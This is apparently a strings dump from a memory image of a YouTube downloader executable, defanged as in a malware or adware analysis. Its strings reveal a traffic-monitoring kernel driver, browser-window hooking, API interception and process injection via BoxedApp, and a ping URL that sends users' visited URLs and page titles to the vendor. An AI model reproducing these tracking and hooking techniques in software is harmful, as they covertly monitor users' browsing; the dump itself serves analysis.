[CRtmpe::OnHandshake] Step 2 - Server version: %x

[CRtmpe::OnHandshake] Step 2 - Server up time: %d

[CRtmpe::OnHandshake] ___Error Step 2: Reading server signature

[CRtmpe::OnHandshake] Step 2 - Protocol: %d

[CRtmpe::OnHandshake] Step 2: Start...

[CRtmpPacket::Reset]

[CRtmpPacket::DumpHeader] Info Field: %d

[CRtmpPacket::DumpHeader] Packet Type: %d

[CRtmpPacket::DumpHeader] Packet Length: %d

[CRtmpPacket::DumpHeader] Absolute Time: %d

[CRtmpPacket::DumpHeader] Time: %d

[CRtmpPacket::DumpHeader] Channel: %d

[CRtmpPacket::DumpHeader] Header Type: %d

[CRtmpPacket::DumpHeader] Header Size: %d

[CRtmpPacket::DumpHeader] Header Byte: 0x%.02X

[CRtmpPacket::ParseHandshakeHeader] ___Error - Header already parsed

[CRtmpPacket::ParseFlvHeader] Absolute Time: %d

[CRtmpPacket::ParseFlvHeader] Packet Length: %d

[CRtmpPacket::ParseFlvHeader] Packet Type: %d

[CRtmpPacket::ParseFlvHeader] Channel: %d

[CRtmpPacket::ParseFlvHeader] Header Type: %d

[CRtmpPacket::ParseFlvHeader] Header Size: %d

[CRtmpPacket::ParseFlvHeader] ___Warning - %d/%d header bytes

[CRtmpPacket::ParseFlvHeader] ___Error - No bytes to analyze

[CRtmpPacket::ParseFlvHeader] ___Error - Header already parsed

[CRtmpPacket::AppendData] Appended: %d (Total: %d/%d)

[CRtmpPacket::AppendData] ___Error - out of memory

[CRtmpPacket::AppendData] ___Warning - no bytes to append

[CRtmpPacket::Allocate] Allocated %d (Total: %d)

[CRtmpPacket::ParseHeader] ___Error - Channel: %d > 9

[CRtmpPacket::ParseHeader] Extended Time: %d

[CRtmpPacket::ParseHeader] Info Field: %d

[CRtmpPacket::ParseHeader] ___Warning - Packet Length: %d > 1M

[CRtmpPacket::ParseHeader] Packet Type: %d

[CRtmpPacket::ParseHeader] Packet Size: %d

[CRtmpPacket::ParseHeader] Time: %d

[CRtmpPacket::ParseHeader] Channel: %d

[CRtmpPacket::ParseHeader] Header Type: %d

[CRtmpPacket::ParseHeader] Header Size: %d

[CRtmpPacket::ParseHeader] Header Byte: 0x%.02X

[CRtmpPacket::ParseHeader] ___Warning - %d/%d header bytes

[CRtmpPacket::ParseHeader] ___Error - No bytes to analyze

[CRtmpPacket::ParseHeader] ___Error - Header already parsed

[CRtmpParser::Stop]

[CRtmpParser::ProcessData] ___Error - Unknown Packet Type: %d, Offset: %d

[CRtmpParser::ProcessData] Analyze Data: %d bytes

[CRtmpParser::ProcessData] ___Warning - Packet not ready for Data Processing

[CRtmpParser::OnHandshake] Step 4: Complete

[CRtmpParser::OnHandshake] Step 3: Complete

[CRtmpParser::OnHandshake] Step 2 - Server version: %d.%d.%d.%d

[CRtmpParser::OnHandshake] Step 2 - Server up time: %d

[CRtmpParser::OnHandshake] Step 1 - Client version: %d.%d.%d.%d

[CRtmpParser::OnHandshake] Step 1 - Client up time: %d

[CRtmpParser::OnHandshake] Protocol State: %d

[CRtmpParser::OnAudio]

[CRtmpParser::OnVideo]

[CRtmpParser::OnFLV]

[CRtmpParser::OnData]

[CRtmpParser::SetTimeStartPosition] Time: %d

[CRtmpParser::SetTimeEndPosition] Time: %d

[CRtmpParser::Close]

[CRtmpParser::OnError]

[CRtmpParser::SetAbsoluteTime] Client Absolute Time: %d (Max: %d)

[CRtmpParser::SetAbsoluteTime] Server Absolute Time: %d (Max: %d)

[CRtmpParser::Sync - %p]

[CRtmpParser::ParseFlvHeader]

[CRtmpParser::ParseData] Accumulated all %d/%d bytes

[CRtmpParser::ParseData] Chunk not ready

[CRtmpParser::ParseData] Going to append %d bytes

[CRtmpParser::ParseData] Got all %d/%d bytes

[CRtmpParser::ParseData] ___Warning - wait for all packet data to arraive (%d/%d)

[CRtmpParser::ParseData] ___Warning no data

[CRtmpParser::ParseData]

[CRtmpParser::ParseDataType] ___Error - Unknown Data Type: %d, Offset: %d

[CRtmpParser::ParseDataType] Date %f %d (Offset: %d)

[CRtmpParser::ParseDataType] Static Array %d (Offset: %d)

[CRtmpParser::ParseDataType] EOF Object (Offset: %d)

[CRtmpParser::ParseDataType] ECMA Array %d (Offset: %d)

[CRtmpParser::ParseDataType] Object (Offset: %d)

[CRtmpParser::OnChangeChunkSize] %d -> %d

[CRtmpParser::OnChangeChunkSize]

[CRtmpParser::OnReadBytes] Bytes read: %d

[CRtmpParser::OnReadBytes]

[CRtmpParser::OnMetadata]

[CRtmpParser::Reset - %p]

[CRtmpParser::ReadObject] ___Error %s - %d (Offset: %d) - Unknown Data Type

[CRtmpParser::ReadObject] EOF Object (Offset: %d)

[CRtmpParser::ReadObject] %s - Long String: %s (Offset: %d)

[CRtmpParser::ReadObject] %s - Date: %g (Offset: %d)

[CRtmpParser::ReadObject] %s - Static Array: %d (Offset: %d)

[CRtmpParser::ReadObject] %s - ECMA Array: %d (Offset: %d)

[CRtmpParser::ReadObject] %s - NULL (Offset: %d)

[CRtmpParser::ReadObject] %s - Object (Offset: %d)

[CRtmpParser::ReadObject] %s - String: %s (Offset: %d)

[CRtmpParser::ReadObject] %s - Boolean: %s (Offset: %d)

[CRtmpParser::ReadObject] %s - Numeric: %g (Offset: %d)

[CRtmpParser::ParseHandshakeHeader] Protocol - RTMPE

[CRtmpParser::ParseHandshakeHeader] Protocol - RTMP

[CRtmpParser::ParseHandshakeHeader]

[CRtmpParser::ParseHeader] Absolute Time: %d

[CRtmpParser::ParseHeader] New Time: %d

[CRtmpParser::ParseHeader] New Absolute Time: %d

[CRtmpParser::ParseHeader] _Prev Packet - Info Field: %d

[CRtmpParser::ParseHeader] _Prev Packet - Buffer Bytes: %d

[CRtmpParser::ParseHeader] _Prev Packet - Buffer Length: %d

[CRtmpParser::ParseHeader] _Prev Packet - Buffer: %p

[CRtmpParser::ParseHeader] _Prev Packet - Packet Type: %d

[CRtmpParser::ParseHeader] _Prev Packet - Packet Size: %d

[CRtmpParser::ParseHeader] _Prev Packet - Absolute Time: %d

[CRtmpParser::ParseHeader] _Prev Packet - Time: %d

[CRtmpParser::ParseHeader] _Prev Packet - Original Header Size: %d

[CRtmpParser::ParseHeader]

[CRtmpParser::UpdateBufferFromServer] Analyzed no bytes

[CRtmpParser::UpdateBufferFromServer] Analyzed %d/%d, Write: %d, Discard: %d

[CRtmpParser::UpdateBufferFromServer] Analyze Next Buffer... (Left: %d)

[CRtmpParser::UpdateBufferFromServer] Decrypt %d/%d bytes

[CRtmpParser::UpdateBufferFromServer] *** Data file Ended at Absolute Time: %d ***

[CRtmpParser::UpdateBufferFromServer] *** Data file Started at Absolute Time: %d ***

[CRtmpParser::UpdateBufferFromServer] Parser was stopped - discard the rest of the data!

[CRtmpParser::UpdateBufferFromServer] Decrypt %d bytes

[CRtmpParser::UpdateBufferFromServer] Parser was stopped - discard all data!

[CRtmpParser::UpdateBufferFromServer] Analyzing %d bytes...

[CRtmpParser::UpdateBufferFromClient] Analyzed %d/%d, Write: %d, Discard: %d

[CRtmpParser::UpdateBufferFromClient] Encrypt %d bytes

[CRtmpParser::UpdateBufferFromClient] Decrypt %d/%d bytes

[CRtmpParser::ParseBuffer] Analyze Next Packet... (Left: %d)

[CRtmpParser::UpdateBufferFromClient] Decrypt %d bytes

[CRtmpParser::UpdateBufferFromClient] ___Warning - Wait for the server handshake to complete...

[CRtmpParser::UpdateBufferFromClient] Analyzed no bytes

[CRtmpParser::UpdateBufferFromClient] Analyzing %d bytes...

[CRtmpParser::operator = %p] <= %p

[CRtmpParser::ParseFlvBuffer] Analyze Next FLV Buffer...

[CRtmpParser::AddDownloadFlowCommand] Method: %s -> Command: %s, Param: %d

[CRtmpParser::OnPing] SWFVerification

[CRtmpParser::OnPing] Time: %d

[CRtmpParser::OnPing] -- Unknown %d --

[CRtmpParser::OnPing] Stream buffer ready %d

[CRtmpParser::OnPing] Pause time: %d

[CRtmpParser::OnPing] Stream buffer empty %d

[CRtmpParser::OnPing] Pong %d

[CRtmpParser::OnPing] Stream is recorded %d

[CRtmpParser::OnPing] Ping %d

[CRtmpParser::OnPing] Stream dry %d

[CRtmpParser::OnPing] Stream EOF %d

[CRtmpParser::OnPing] Stream begin %d

[CRtmpParser::OnPing] Type: %d

[CRtmpParser::OnPing]

[CRtmpParser::OnServerBW] Server Bandwidth: %d

[CRtmpParser::OnServerBW]

[CRtmpParser::OnClientBW] Client Bandwidth: %d

[CRtmpParser::OnClientBW]

[CRtmpParser::OnInvoke] ___Error - Unknown Invokde method: %s

[CRtmpParser::OnInvoke] setBandwidthLimit( %g, %g )

[CRtmpParser::OnInvoke] getStats

[CRtmpParser::OnInvoke] secureTokenResponse: Token = %s

[CRtmpParser::OnInvoke] closeStream: StreamID = %g

[CRtmpParser::OnInvoke] deleteStream: StreamID = %g

[CRtmpParser::OnInvoke] releaseStream: PlayPath = %s

[CRtmpParser::OnInvoke] startStream: PlayPath = %s

[CRtmpParser::OnInvoke] createStream: StreamID = %g

[CRtmpParser::OnInvoke] %s( '%s', '%s', '%s' )

[CRtmpParser::OnInvoke] %s( '%s', '%s' )

[CRtmpParser::OnInvoke] seek( '%d' )

[CRtmpParser::OnInvoke] %s( '%d', '%g' )

[CRtmpParser::OnInvoke] %s( '%s' ), PacketInfo: %d

[CRtmpParser::OnInvoke] onStatus - code: %s, level: %s

[CRtmpParser::OnInvoke] _error - code: %s, level: %s

[CRtmpParser::OnInvoke] %s( '%s' )

[CRtmpParser::OnInvoke] _result createStream: StreamID = %g

[CRtmpParser::OnInvoke] _result connect - AMF3

[CRtmpParser::OnInvoke] _result connect: %s

[CRtmpParser::OnInvoke] _result for Method: %s

[CRtmpParser::OnInvoke] Method: %s

[CRtmpParser::OnInvoke]

Download Helper SendMsgToBtn, url: %s

Could not find converter registry key, %ws

Could not create process, error %x, proc %ws

RegContentType%d

RegRawData%d

RegProtocol%d

RegAgent%d

RegCookie%d

1.0.1.0

RegFileName%d

RegUrl

RegURL%d

%ws_%d.log

- Mozilla Firefox

- Windows Internet Explorer

opera

firefox

chrome

OPERA

opera.exe

safari.exe

firefox.exe

iexplore.exe

chrome.exe

explorer.exe

Google Chrome

Chrome_WidgetWin_1

Firefox

FirefoxBrowserWindow Found browser window, 0x%x

FirefoxBrowserWindow Found button window, 0x%x

IE9BrowserWindow Found browser window, 0x%x

IE9BrowserWindow Found button window, 0x%x

OperaBrowserWindow Found browser window, 0x%x

OperaBrowserWindow Found button window, 0x%x

Opera

SafariBrowserWindow Found browser window, 0x%x

SafariBrowserWindow Found button window, 0x%x

hXXp://VVV.youtube.com/watch?v=

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari/537.1

YTParser url not valid %ws

SBMonitor.log

Error no signature found at %s

GetVideoUrlAndSizeFromWatchPage Could not extract url_encoded_fmt_stream_map params.

GetVideoUrlAndSizeFromWatchPage

YTParser could not find valid url, not downloading

hXXp://VVV.youtube.com/get_video_info?video_id=

GetVideoUrlAndSizeFromVideoInfo

Failed processing urls from watch page.

reportLevel

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

(build %d)

Windows 2000

Windows XP

Web Edition

Windows Server 2003,

Windows XP Professional x64 Edition

Windows Home Server

Windows Storage Server 2003

Windows Server 2003 R2,

Web Server Edition

Windows Server 2008 R2

Windows 8

Windows 7

Windows Server 2008

Windows Vista

{X-hX-hX-XX-XXXXXX}

sbmntr.sys

Converter.exe

DownloadHelper.exe

HELPEREXELOCATION

YTDownloader.exe

MONITOREXELOCATION

hXXp://VVV.ytdownloader.com/feedback/

Driver - %ws: %x

\\.\SBMonitor

net.exe

Driver installed, NOT loaded: %s

Driver installed, loaded from %s

Software\Opera Software\

%programFiles%\Opera\opera.exe

Apple Application Support\WebKit2WebProcess.exe

Safari.exe

%programFiles%\Safari\Safari.exe

%programFiles%\Mozilla Firefox\firefox.exe

IEXPLORE.EXE

%programFiles%\Internet Explorer\iexplore.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

%LOCALAPPDATA%\Google\Chrome\Application\chrome.exe

converter.exe

webm

[CMonitor::AddAppIdToDriver]___Error: Could not add App Ids (%x).

Same as one of buttons PID %d

Same as our PID %d

[CMonitor::EnableMonitoring]___Error: Could not enable monitoring device (%x).

___Error: Could not open device (%u).

-pid %d -size %s -sizeBytes %I64d -type %s -url %s -cookie %s -referer %s -host %s -useragent %s -resolution %s -protocol http

CMonitor::BuildParams Already created similar url, %ws

CMonitor::BuildParams Button exists for similar url, %ws

youtube.com

-pid %d -size %I64d -sizeBytes %I64d -type %s -url %s -cookie %s -referer %s -host %s -ads %s -useragent %s -protocol http

-pid %d -rawdata %s -protocol rtmp -duration %s -resolution %s

Fwpuclnt.dll

https

Not application/octet-stream video and the size is bigger than %d, %d

Not application/octet-stream video and the size is smaller than %d

Not FLV video and the size is smaller than %d

vid2.ak.dmcdn.net

CHttpMonitor::SameYoutubeVideo Same params page id = %s, itag = %s

CHttpMonitor::SameYoutubeVideo DASH same params page id = %s, itag = %s

CHttpMonitor::SameYoutubeVideo Same watch page %s

HTTP_Version_String

[HttpParser::ParseLine] ___Error: The field separator was not found in the line:

VVV.google.com

Global\{9DA0BEED-7248-450a-B27C-C0409BDC377D}

YTD-icon-128x128.png

Advapi32.dll

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

%saction=%s&userid=%s&usid=%s&aff=%s&v=%s&url=%s&title=%s&pingtext=%s&protocol=%s&size=%I64d&ref=%s&browser=%s

hXXp://rep.ytdownloader.com/app/ping.ashx?

%s%s%s

[RtmpDownloader::CreateProcessStdoutPipe] ___Error SetHandleInformation: %d

[RtmpDownloader::CreateProcessStdoutPipe] ___Error CreatePipe: %d

[RtmpDownloader::CreateProcessStdoutPipe] ___Error StdOut CloseHandle: %d

rtmpdump.exe

[RtmpDownloader::ReadFromPipe] --- Download Ends ---

[RtmpDownloader::ReadFromPipe] --- Download Begins ---

[RtmpDownloader::RunCommandLine] ___Error CreateProcess: %s. LE: %d

Error : failed to run FFmpeg - %d

[RtmpDownloader::RunCommandLine] ___Error CreateProcessStdoutPipe

Failed to run update (%x).

Trying to execute an update.

CUpdater::parseUpdateXML Set report level to %ws

REPORT

CMDLINE

%sid=%d_r=%lld_err=%d

%suserid=%s&aff=%s&v=%s

hXXp://VVV.ytdownloader.com/app/update.ashx?

mscoree.dll

KERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

ADVAPI32.DLL

WUSER32.DLL

<>"#%{}|\^~[]`' ?&

%Program Files%\YTDownloader\YTDownloader.exe

1.0.3.9

YTDownloader.exe_2468_rwx_10000000_000E6000:

.text

`.rdata

@.data

.rsrc

@.reloc

</.uCU

FtPh8

u$D

<p.uH

FTPSW

The embedding BoxedApp into child processes: %s

GetCommandLineA preparing to intercept...done

GetCommandLineW preparing to intercept...done

The command line overriding: %s

Get old args...done

Get current dir...done

Get the extension...done

Get exe dir...done

Get exe dir...

550e832f-a497-4eb7-bb40-8cc856f6d152

BoxedAppSDK::FileSystem::CFileSystem::DoFileOperation_FullPath

, passed pBehavior returns FILE_ATTRIBUTE_DIRECTORY attribute, but it's requested to create not a directory

, passed pBehavior doesn't support IVirtualFile

, passed pBehavior doesn't return FILE_ATTRIBUTE_DIRECTORY attribute, but it's requested to create a directory

It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream

[Isolation] DoFileOperation_FullPath: CreateFileDeletedInformationFile

BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys

NtEnumerateKey() returned unexpected error, status =

, RegTree::IEnumKeyNode::GetNext() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys

, RegTree::IKeyNode::EnumKeys() failed, hr =

: IVirtualKeyHandle::CreateKey() failed, hr =

: RegTree::IEnumKeyNode::GetNext() failed, hr =

: GetAllChildsKeys() failed, status =

BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal

: RegTree::IKeyNode::EnumKeys() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath

error, IVirtualKeyHandle_GetFullPath() returned

Invalid key information class:

KeySetHandleTagsInformation is not supported for virtual handle

KeySetDebugInformation is not supported for virtual handle

KeySetVirtualizationInformation is not supported for virtual handle

KeyControlFlagsInformation is not supported for virtual handle

KeyWow64FlagsInformation is not supported for virtual handle

We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles

We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles

: IVirtualKeyHandle::Rename() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal

: RegTree::IKeyNode::Rename() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::SearchNodePointsToRealKey

: CRegistry::SetIsolationMode() failed for the hKey =

BoxedAppSDK::Registry::Impl::CRegistry::CreateNodePointsToRealKey

: result hkey =

: IVirtualKey::CreateKey() failed, hr =

: we can't create a virtual key with its own behavior under another virtual key

: Handles::CreateVirtualKeyHandle() failed, hr =

: IVirtualKey::OpenKey() failed, hr =

: GetFullRegKeyPath() failed for the hKey =

: Handles::IVirtualKeyHandle::CreateKey() failed and returned

: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key

BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKeyHelper

: lpSubKey: "

BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey

BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKeyEx

BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal

: SearchStartingFromRealKey() failed

: RegTree::IKeyNode::FindValue() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal

: IVirtualKeyHandle::put_Value() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime

: NtQueryKey() failed, status =

: NtOpenKey() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys

: NtEnumerateValueKey() failed when we tried to get name of the node, status =

: IKeyNode::EnumValues() failed, hr =

: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =

: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal

BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal

: invalid KeyInformationClass passed:

: IVirtualKeyHandle_GetFullPath() failed, hr =

: Behavior::IEnumVirtualKey::GetNext() failed, hr =

: IVirtualKeyHandle::EnumValues() failed, hr =

: IVirtualKeyHandle::EnumKeys() failed, hr =

: IVirtualKeyHandle::get_LastWriteTime() failed, hr =

reg:NtQueryMultipleValueKey(

: IKeyNode::FindValue() failed, hr =

: IVirtualKeyHandle::get_Value() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal

: IVirtualKeyHandle::get_ValueType() failed, hr =

reg:NtSetInformationKey(

RegTree::IKeyNode::RemoveValue() failed, hr

BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal

reg:NtRenameKey(

reg:NtCreateKey(

BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyProcessView

RegTree::IEnumKeyNode::GetNext(), hr =

reg:NtDeleteValueKey(

: NtEnumerateKey() failed when we tried to get name of the node, status =

, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =

, Behavior::IVirtualKey::OpenKey() failed, hr =

: IKeyNode::EnumKeys() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal

reg:NtEnumerateValueKey(

reg:NtOpenKey(

reg:NtQueryKey(

reg:NtQueryValueKey(

reg:NtSetValueKey(

BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal

reg:NtEnumerateKey(

reg:NtDeleteKey(

TryCreateProcessForVirtualEXE, template exe found:

CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x

CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x

CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x

CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x

CBoxedAppCore::My_NtQueryKey, KeyHandle =

CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =

CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x

KernelBase.dll

kernel32.dll

0x%x%x

CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '

CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x

CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '

CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x

CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '

CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x

CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '

CBoxedAppCore::My_NtRenameKey, KeyHandle =

BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart

: Can't create process of rundll32.exe, last error =

VirtualDllWithSameImport.dll

BoxedAppSDK_RemoveExeFromAttachableChildProcListW

BoxedAppSDK_RemoveExeFromAttachableChildProcListA

BoxedAppSDK_AddExeToAttachableChildProcListW

BoxedAppSDK_AddExeToAttachableChildProcListA

BoxedAppSDK_RemoveExeFromAttachableChildProcExclusionListA

BoxedAppSDK_RemoveExeFromAttachableChildProcExclusionListW

BoxedAppSDK_AddExeToAttachableChildProcExclusionListA

BoxedAppSDK_AddExeToAttachableChildProcExclusionListW

BoxedAppSDK_GetRegKeyIsolationModeA

BoxedAppSDK_GetRegKeyIsolationModeW

BoxedAppSDK_SetRegKeyIsolationModeA

BoxedAppSDK_SetRegKeyIsolationModeW

BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper

BoxedAppSDK_AttachMixedBitnessProcessHelper

BoxedAppSDK_EnumVirtualRegKeysA

BoxedAppSDK_EnumVirtualRegKeysW

BoxedAppSDK_ExecuteDotNetApplicationA

BoxedAppSDK_ExecuteDotNetApplicationW

BoxedAppSDK_DeleteVirtualRegKeyByHandle

BoxedAppSDK_DeleteVirtualRegKeyW

BoxedAppSDK_DeleteVirtualRegKeyA

BoxedAppSDK_AddVirtualRegKeyW

BoxedAppSDK_AddVirtualRegKeyA

BoxedAppSDK_CreateVirtualRegKeyW

BoxedAppSDK_CreateVirtualRegKeyA

{4F95F74C-9713-4181-ACDD-8A50195FBC0F}

BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper

BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper

CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '

CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x

CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x

:\VirtualDllWithSameImport.dll

:\VirtualDllWithTls.dll

VirtualDllWithTls.dll

_CorExeMain

ole32.dll

WinExec

advapi32.dll

NtRenameKey

NtUnloadKey

NtSetValueKey

NtSetInformationKey

NtSaveKey

NtRestoreKey

NtReplaceKey

NtQueryValueKey

NtQueryMultipleValueKey

NtQueryKey

NtOpenKeyEx

NtOpenKey

NtNotifyChangeKey

NtLoadKey2

NtLoadKey

NtFlushKey

NtEnumerateValueKey

NtEnumerateKey

NtDeleteValueKey

NtDeleteKey

NtCreateKey

ntdll.dll

[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]

FILE_EXECUTE

GENERIC_EXECUTE

KEY_WOW64_64KEY

KEY_WOW64_32KEY

KEY_NOTIFY

KEY_CREATE_LINK

KEY_ENUMERATE_SUB_KEYS

KEY_CREATE_SUB_KEY

KEY_SET_VALUE

KEY_QUERY_VALUE

SECTION_MAP_EXECUTE

PAGE_EXECUTE_WRITECOPY

PAGE_EXECUTE_READWRITE

PAGE_EXECUTE_READ

PAGE_EXECUTE

STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED

STATUS_LOCAL_USER_SESSION_KEY

STATUS_NULL_LM_PASSWORD

STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE

STATUS_CARDBUS_NOT_SUPPORTED

STATUS_INVALID_PORT_ATTRIBUTES

STATUS_PORT_MESSAGE_TOO_LONG

STATUS_PORT_DISCONNECTED

STATUS_PORT_CONNECTION_REFUSED

STATUS_INVALID_PORT_HANDLE

STATUS_PORT_ALREADY_SET

STATUS_EAS_NOT_SUPPORTED

STATUS_CTL_FILE_NOT_SUPPORTED

STATUS_WRONG_PASSWORD

STATUS_ILL_FORMED_PASSWORD

STATUS_PASSWORD_RESTRICTION

STATUS_PASSWORD_EXPIRED

STATUS_FLOAT_DENORMAL_OPERAND

STATUS_FLOAT_INVALID_OPERATION

STATUS_PIPE_NOT_AVAILABLE

STATUS_INVALID_PIPE_STATE

STATUS_PIPE_BUSY

STATUS_PIPE_DISCONNECTED

STATUS_PIPE_CLOSING

STATUS_PIPE_CONNECTED

STATUS_PIPE_LISTENING

STATUS_NOT_SUPPORTED

STATUS_PIPE_EMPTY

STATUS_WRONG_PASSWORD_CORE

STATUS_PIPE_BROKEN

STATUS_DISK_OPERATION_FAILED

STATUS_KEY_DELETED

STATUS_KEY_HAS_CHILDREN

STATUS_NO_USER_SESSION_KEY

STATUS_PASSWORD_MUST_CHANGE

STATUS_PORT_UNREACHABLE

STATUS_LOGIN_TIME_RESTRICTION

STATUS_LOGIN_WKSTA_RESTRICTION

STATUS_UNSUPPORTED_COMPRESSION

STATUS_NO_USER_KEYS

STATUS_NOT_EXPORT_FORMAT

STATUS_TRANSPORT_FULL

STATUS_WMI_NOT_SUPPORTED

STATUS_SAM_NEED_BOOTKEY_PASSWORD

STATUS_SAM_NEED_BOOTKEY_FLOPPY

STATUS_STRONG_CRYPTO_NOT_SUPPORTED

STATUS_NOT_SUPPORTED_ON_SBS

STATUS_CSS_KEY_NOT_PRESENT

STATUS_CSS_KEY_NOT_ESTABLISHED

STATUS_NO_KERB_KEY

STATUS_UNSUPPORTED_PREAUTH

STATUS_PORT_NOT_SET

STATUS_INVALID_IMPORT_OF_NON_DLL

STATUS_SMARTCARD_NO_KEY_CONTAINER

STATUS_SMARTCARD_NO_CERTIFICATE

STATUS_SMARTCARD_NO_KEYSET

STATUS_SMARTCARD_CERT_REVOKED

STATUS_SMARTCARD_CERT_EXPIRED

STATUS_SXS_KEY_NOT_FOUND

STATUS_CLUSTER_JOIN_IN_PROGRESS

STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS

RegDeleteKeyExW

NtRequestWaitReplyPort

NtConnectPort

NtReplyPort

NtCompleteConnectPort

NtAcceptConnectPort

NtReplyWaitReceivePort

NtCreateWaitablePort

Imported function,

.data

.idata

GetWindowsDirectoryW

GetProcessHeap

KERNEL32.dll

USER32.dll

GDI32.dll

RegCloseKey

RegDeleteKeyW

RegCreateKeyExW

RegOpenKeyExW

RegOpenKeyW

ADVAPI32.dll

OLEAUT32.dll

bxsdk32.dll

i:\build\boxedapp_src\src\boxedapp\bxsdk\bin\release_full\bxsdk32.pdb

`.rsrc

v2.0.50727

BoxedAppSDK_AppDomainManager.dll

System.Security

.ctor

System.Security.Policy

System.Reflection

System.Runtime.InteropServices

System.Diagnostics

System.Runtime.CompilerServices

System.IO

DllImportAttribute

shell32.dll

lpCmdLine

System.Collections

System.Security.Permissions

1.0.0.0

$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78

I:\build\boxedapp_src\src\BoxedApp\bxsdk\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb

mscoree.dll

BoxedAppSDKThunk.dll

i:\build\boxedapp_src\src\boxedapp\bxsdk\obj\win32\release_full\boxedappsdkthunk\BoxedAppSDKThunk.pdb

.reloc

TLSSupport.dll

i:\build\boxedapp_src\src\boxedapp\bxsdk\obj\win32\release_full\tlssupport\TLSSupport.pdb

5"6.676@6|6

3O4L4T4]4

3(4,40444

11U1|1

>%>*>0>5>

2(4,40444

5f6D6e6

0=0"1.171@1`1

9%9u9~9

3 3-343;3

5o6L6T6]6

< ='=2=8=

;%;,;2;8;=;

: :4:8:<:@:

? ?$?(?,?0?4?8?<?

: :$:(:,:0:

GdiPlus.dll

HKEY_USERS

HKEY_CURRENT_CONFIG

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

%s\%s

:\tempManifest.manifest

%s\winsxs\tempBxDir\virtualAsm

BoxedAppVar:OldCmdLine

BoxedAppVar:ExeFullPath

BoxedAppVar:ExeFileNameWithoutExtension

BoxedAppVar:ExeFileExtension

BoxedAppVar:ExeFileName

BoxedAppLog_%d.txt

%s_%.8x

#SystemDrive#\#Windows#

#SystemDrive#\#Windows#\#System32#

\Device\NETBT_TCPIP_

\DosDevices\pipe\

\Device\NamedPipe\

\??\pipe\

publicKeyToken

Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\

.manifest

%s_%.8x_%.8x

.boxedapp_msg_process

boxedapp_event_newmsg

boxedapp_msg_global

bxsdk64.dll

:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\

\KernelBase.dll

\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll

\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll

%d-%d-%p

:\TLSSupport310D39B571B74d36B95451DD240D8758

",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper

\rundll32.exe"

